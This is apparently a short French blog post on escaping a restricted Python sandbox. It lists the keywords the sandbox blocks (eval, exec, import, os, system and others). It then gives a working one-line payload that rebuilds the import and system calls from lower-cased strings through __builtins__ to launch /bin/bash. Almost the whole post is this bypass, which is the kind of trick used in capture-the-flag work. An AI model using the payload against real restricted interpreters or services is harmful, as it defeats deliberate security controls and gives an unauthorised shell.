Jailbreak python

Par exemple un script python permet l’exécution de scripts mais restreint l’utilisation des mots

  • eval
  • exec
  • import
  • open
  • os
  • read
  • system
  • write

Il est possible d’outrepasser les mesures de sécurité

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')

Leave a Reply